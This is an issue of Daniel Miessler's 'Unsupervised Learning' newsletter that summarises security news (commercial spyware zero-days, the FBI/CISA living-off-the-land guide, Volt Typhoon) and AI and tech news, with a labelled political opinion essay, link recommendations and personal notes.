UL NO. 419: Problem Quality, 0-Day Spyware, LOTL, Ollama + OpenAI
2024-2-13 01:49:30 Author: danielmiessler.com(查看原文) 阅读量:19 收藏

Unsupervised Learning is a security, AI, and meaning-focused newsletter that looks at how best to thrive as humans in a world that’s changing faster than ever. It combines original ideas and analysis to bring you not just what’s happening—but why it matters, and how to respond.

TOC

Hey there,

A few quick things…

  • I’m seriously messing up on the gym/weights/walking/table tennis side. Have only exercised a few times in the last few weeks! And I can feel it.

  • The reason for this is that my energy and mood have been so high from my work, and I’ve basically been going non-stop. No excuse. I tell you all about this so you can shame me.

  • Tons of inbound interest of all kinds due to Fabric taking off. A million ideas for how to improve it already! Many thanks to @xssdoctor for being such a huge part of the project. You know…between his patients as a f’ing cardiologist!

Let’s get into it…

MY WORK

SECURITY

Google’s TAG group says 80% of the zero-day vulnerabilities it’s tracked have come from commercial spyware vendors. Google's been watching 40 of these companies and they specifically call out some of them, including: Cy4Gate, RCS Lab, Intellexa, Negg Group, NSO Group, and Variston. MORE

💡I’m noticing an interesting pattern here. The biggest threat to your data is might not be the dark web, but data brokers, which are actual companies. And the biggest threat from weaponized 0-days might not be the random attacker, but commercial spyware companies. Which, again, often sell legally. So it’s not the criminal activity that’s most scary, it’s the criminal activity that’s weaponized into a “legitimate” business. What’s another example? Lobbying?

Related to that, the US is going after commercial spyware by banning visa entries for people known to be associated with the industry. MORE

Americans lost a record $10 billion to fraud in 2023, according to the FTC's latest report. Which is up 14% from 2022. Investment scams were the main type, and they were up 21% YOY. MORE

Sponsor

GO BEYOND PENTEST MANAGEMENT AND REPORTING WITH PLEXTRAC

What if you could cut the time spent on pentest reporting workflows in half? With PlexTrac, you can

  • Analyze your attack surface at the asset level.

  • Action all pentest and vulnerability scanner data in one place.

  • Use context-based scoring to prioritize risk

  • Conquer the last mile of continuous validation. 

What does this mean for you? 

Check out PlexTrac.com/UnsupervisedLearning for a personalized demo to see how PlexTrac can help you boost efficiency and recognize real value, today. 

Cory Doctorow got scammed by someone claiming to be part of his bank, and he wrote a full blog post about it. Hat off for the vulnerability, but the guy called on a crappy VOIP line and mispronounced the credit union name and asked for his full credit card number? And he gave it to him? In his defense, he says he knows his credit union uses people with bad mics who don’t know how to pronounce the name of the credit union. Jesus, man, get a new bank. Still, I do appreciate the transparency. MORE

The FTC has officially banned AI Deepfake robocalls. I’m curious how much effect this will have given that most scammers are already breaking the law on purpose in multiple ways. But I like how quickly action was taken. MORE

Canada is moving to ban the Flipper Zero to address a spike in car thefts. The creators of Flipper Zero argue that their device cannot be used to steal cars made after the 1990s due to advanced security systems. Pretty happy I don’t live in Canada (or Florida) where the government just randomly bans stuff. MORE

OnlyFake is putting out really good fake IDs with AI. The site claims to produce up to 20,000 documents daily using "neural networks" and "generators”. Seems like they’re probably going to get smashed by authorities, but here come the copycats. MORE

The FBI and CISA have put out a joint guide to "Living Off The Land" (LOTL) attacks, where attackers use legitimate tools for malicious purposes. MORE | GUIDE PDF

CISA revealed that the Volt Typhoon hacking group, backed by China, has been lurking undetected in some US critical infrastructure IT environments for over five years, potentially sleeping for future attacks. MORE

A crowd in San Francisco attacked and set on fire a Waymo car. If you haven’t seen the animated Matrix series, go watch it. It’s about to be super relevant. MORE

A Chinese group infiltrated the Dutch military's network with a previously unknown malware strain, Coathanger, designed to persist through reboots and firmware upgrades. The impact was minimized due to the network's segmentation, affecting less than 50 users involved in unclassified R&D projects. MORE

Incidents

Verizon accidentally exposed over 63,000 employees' personal data. MORE

💡Someone asked me on a podcast recently why so many telcos have security issues. I didn’t have a better answer than lots of users and lots of employees. In other words, lots of attack surface? If someone has a better analysis, let me know.

Vulnerabilities

🪳FORTINET VULNERABILITIES — Fortinet's FortiSIEM faces two critical vulnerabilities enabling remote code execution. | CRITICAL | 10.0 | MORE

🪳Critical Patches Released for new Flaws in Cisco and VMware products as well, up to 9.6 on the Richter scale. MORE

TECHNOLOGY

A study (and paper) put human lawyers up against LLMs for evaluating legal documents. It was like you’d probably expect. For determining legal issues, LLMs (specifically GPT4-1106) matched or slightly exceeded the accuracy of Junior Lawyers and were very close to the accuracy of LPOs. For locating legal issues, LLMs were slightly less accurate than LPOs but still outperformed Junior Lawyers. Worse, though, was the speed difference. LLMs did that work between 91.63% to 99.64% faster than the human reviewers. MORE

💡This seems like a good time to mention a piece of advice I have for previously high-status jobs that are vulnerable to AI, e.g., lawyers, doctors, engineers. Build a brand and learn how to do your thing in public. If you can’t figure out how to broadcast your expertise as a unique message, and connect with people, you’re likely to get crushed by AI. Many of these professions have one thing in common: they are based on collecting knowledge and experience into an education, and imperfectly giving that experience to a human. That is the worst possible place to be as a human, because AI has, or will soon have, the life and work experience of millions of doctors/lawyers/engineers. Get to the human side ASAP.

🔥 Ollama now supports OpenAI’s API format, meaning you can just substitute your OpenAI calls for Ollama calls (which are local), and get local results. Super cool! MORE

Sam Altman bets on AI creating one-person billion-dollar companies soon. In a chat with tech CEO friends, Altman predicts AI advancements will enable a single person to run a billion-dollar company by automating jobs across various sectors. Yep, this is what we’ve been saying here. MORE

Sam Altman is looking to raise up to $7 trillion (that’s a “t”) for AI chip production. The plan involves a partnership between OpenAI, investors, chip makers, and power providers to build new chip foundries, with OpenAI committing to be a major customer. MORE

💡I’m starting to think that you need basically crazy people to make real progress. Jobs. Musk. Altman. The winning combination seems to be an insane vision, and then not listening to anyone who tells you it’s impossible.

HUMANS

Mexico has overtaken China as the top exporter to the US. Factors contributing to this shift include Trump-era tariffs and Biden's climate policies making Chinese imports costlier, plus strategic moves by manufacturers to relocate closer to the US market due to political tensions and rising labor costs in China. MORE

Researchers have used information theory to analyze why Bach's music feels so compelling. They analyzed his compositions by converting them into information networks and found some patterns that may explain why he was so good. MORE

💡I’m currently obsessed with Claude Shannon’s Information Theory and how it applies to real life, so this is interesting. Here’s how I think it applies to writing and giving presentations. MORE

The wealthy are cutting lines all over the place, like at the airport, Disney World and ski resorts. From Tinder's $499 membership to ski lift fast-track passes, people are paying premiums to bypass queues. MORE 

💡People with money seem to be increasingly living in a completely different world than those without it. Meaning, someone who makes $50,000 a year, which used to be decent money, is now vastly less capable of doing things than someone who makes like $150K or above (an arbitrary, anecdotal cutoff). That’s 3X as much, so that may seem obvious, but it didn’t used to be that way. Or at least it didn’t seem so to me. In the 80’s and 90’s we were all doing the same stuff, in the same places. Now, if you go to nicer cafes or restaurants they don’t really have many people there doing regular jobs. Meals at nice places are usually (at least in the Bay Area), over $120, and that’s just for 2 people. Rent is insane. Mortgage, forget about it. Food bills. Gas? I honestly don’t know what anyone is going to do on $50,000 in big cities on the coasts. And this separation of restaurants, hobbies, neighborhoods, and other parts of our lives cannot be healthy.

Gallup just showed that only 47% of Americans report being "very satisfied" with their lives, a figure that's just barely above the record low set in 2011. Those earning over $100,000, married individuals, religious attendees, college graduates, Democrats, and those aged 55 and older are more likely to report high levels of satisfaction. See the callout above. MORE | GALLUP STUDY

The Three-Body Problem's audiobook is getting a new voice with Rosalind Chao, just ahead of Netflix's adaptation. Actress Rosalind Chao, known for her role in the Netflix series, is narrating the new audiobook version of The Three-Body Problem, offering a unique take on the entire story. The new audiobook comes out February 27th. I’m going to re-read (listen to) this version. MORE

Over the past three years, Democrats’ lead with Black Americans has decreased by nearly 20 points, and similar declines are seen among Hispanic adults and young adults aged 18 to 29. Democrats still maintain a significant lead among non-Hispanic Black adults, with a 47-percentage-point advantage, but this is the smallest margin Gallup has recorded since it began its polling. MORE

Seine-Port, a quaint village near Paris, recently voted to limit smartphone use in public spaces, aiming to encourage more human interaction and less screen time. MORE

A startling 46% of Americans didn't finish a single book last year, placing anyone who read at least two books in the top half of American readers. I surmise that these numbers are wildly too high, due to the book version of preference falsification. But maybe if we’re counting comic books, true crime, romance, and that kind of stuff, we get close to 50%. I’d love to see the number for non-true-crime, non-fiction books. I bet that number is closer to 10%? Anyone know any numbers there? MORE

IDEAS & ANALYSIS

How to Elect Donald Trump in 2024 (Politics, Skip if That’s Not Your Thing)

I’ve said this a dozen times already, but I’m going to say it again here on the off chance that there’s anyone that’s reachable.

If Trump gets elected it will be due to catastrophic Democratic mistakes. It won’t be Trump. Trump is easy to beat. It’ll be the left assassinating itself.

All you have to do to beat Trump is not be so extreme in your liberal views. Not sure what I mean? Here, I’ll make a list. 

Here’s how to get Trump elected.

  • Say the US is a horribly unfair and racist country despite the fact that non-white immigrants want to come here more than anywhere, because it’s the most meritocratic place on the planet.

  • Say White Supremacy is worse than it’s ever been.

  • Say Jewish people are the most evil and entitled white people, and that they deserved what happened in Gaza.

  • Say any raising of illegal immigration as an issue makes you a racist.

  • Say that rich people are the source of all our problems.

Say those things and you elect Trump.

Or, to put it another way, all a Democratic candidate would have to do to beat Trump would be to take away those weapons.

Here’s 4 things they could say to beat Trump easily. And they can still be liberals! Like me!

  • Yeah, the Republicans are right about illegal immigration. It’s bad. We’re addressing it. We’re boosting the border patrol by ___ amount, and increasing enforcement on criminals here illegally by ____ amount. But we’re also opening up more legal immigration, because our immigrants are awesome and they make great Americans.

  • No. America is not a horrible country. It’s actually one of the best countries in the world. It’s not the best because we’ve made no mistakes. It’s the best because we try really hard to fix them, and to become the country we’ve always wanted. And we continue to make progress. Don’t believe me? Let’s look at actual numbers. Look at China. Look at Latin America. Look at most countries in Africa. Are they anywhere near as open to minorities as the U.S.? How many religious minorities do they have in political office? How many women? How many LGBTQ people? Racial minorities? How about those same groups running businesses? How do those numbers compare to the U.S.? (then give the numbers that show they have the most diverse political and business leaders anywhere in the world!). We lead the world in lifting people of all groups and cultures to the highest levels in our society. Be proud of that.

  • There’s nothing wrong with being rich or successful. Here in America we look up to that. We always have, and it’s ok to do so. But we also believe that becoming successful has a lot of luck in it. The luck of good parents, or luck of learning the value of grit, discipline, and hard work at an early age, or the luck of being super smart or knowing the right people. That doesn’t take away the extremely hard work it takes to become successful, but it gives the successful a responsibility. Not to give away what they earned, but to invest some of it into those who weren’t so lucky. So THEY can work hard and become successful too.

  • It’s time to be done with cancel culture. It served a good and necessary purpose when we got rid of people like Harvey Weinstein, and we need to continue to stay vigilant against that type of trash across our entire society. But people are flawed, and people can change. And we’ve all known someone who’s a good person who’s done something shameful, that they regret. It’s up to us to know the difference between those people and the Harvey Weinstein’s of the world. And it’s up to us to stop treating them like they’re the same. Enough.

This is very simple. Say those 4 things and you beat Donald Trump by 10-30%. Continue on with the self-hate and you will find out just how tired the country is with Wokeism.

In other words, Trump could easily win by 5-20% just as a country-wide message to the extreme left that it no longer wants what they’re selling.

NOTES

  • Super excited for the second part of Dune.

  • Can’t wait for the new Three Body Problem series.

  • Got a couple of talks I’m flying to in the next couple of months, and I’m looking forward to using the Apple Vision Pro to work during them!

  • Really need to get back to table tennis and gym and rucking!

DISCOVERY

🖥️ Sudo for Windows — Elevate commands without a new console | by Jordi Adoumie | MORE

🛠 Toolong — Terminal app for log file viewing and management | by Textualize | MORE

🎼 An extraordinary EDM set by my now favorite artist of this genre, CloZee. MORE

🧱 A pretty solid AI stack in February of 2024:

My current OSS go-to stack:

- @supabase for db, auth, storage, realtime
- @LangChainAI for building my rag pipelines
- @posthog for analytics
- @FastAPI for the backend
- @nextjs for the frontend
- @resend for the emails
- @LiteLLM for LLMs compatibility
-  @ollama &… twitter.com/i/web/status/1…

— Stan Girard (@_StanGirard)
Feb 10, 2024

In a GenAI World, Only Identity Matters — A great essay about the problems of identifying who’s doing what in a world full of GenAI. | by Caleb Sima | MORE

Required Security Changes for Secure AI Agents — A solid piece on what will be needed for AI agents to securely operate in real-world scenarios. | by Joseph Thacker | MORE

Jess Weinstein is excited about Stripe building new zero-to-one products, such as “Support-as-a-service” | by Jeff Weinstein | MORE

OKRs are Bullshit MORE

Simple Precision Time Protocol at Meta MORE

TikTok Is Destroying Itself from the Inside Out MORE

How Levels.fyi scaled to millions of users with Google Sheets as a Backend MORE

Wirecutter content is now freely accessible through Apple News. MORE

Applying Threat Intelligence to the Diamond Model of Intrusion Analysis MORE

OPML is Underrated MORE

The world is awful. The world is much better. The world can be much better. MORE

YouTube now supports uploading podcasting RSS feeds, which means if you used to be an audio podcast person, you can automatically publish your stuff on YouTube when it goes live on the audio version! MORE

Parse, don't validate MORE

RECOMMENDATION OF THE WEEK

Think about the problems you’re working on, and ask yourself if they’re worth years of your attention. There are a lot of layoffs right now, so I’m not recommending you quit your job next week to find beautiful problems.

But I am recommending that you start thinking about it. Especially if the universe is conspiring against us and ends up laying us off, or making it hard to find a job. You might as well make the next one a place where you deeply care about the problems, and the solution.

There are a million benefits of this, but one is also that you’re far more likely to shine at work, and thus be non replaceable, if you’re deeply motivated by the mission.

APHORISM OF THE WEEK

Your work can only be as good as your problems are meaningful.

Thank you for reading.

UL is a personal and strange combination of security, tech, AI, and lots of deeply human content. And because it’s so diverse, it’s harder for it to go as viral as something more niche.

So if you know someone weird like us, please share it with them. 🫶 

Yours,


文章来源: https://danielmiessler.com/p/ul-419
如有侵权请联系:admin#unsafe.sh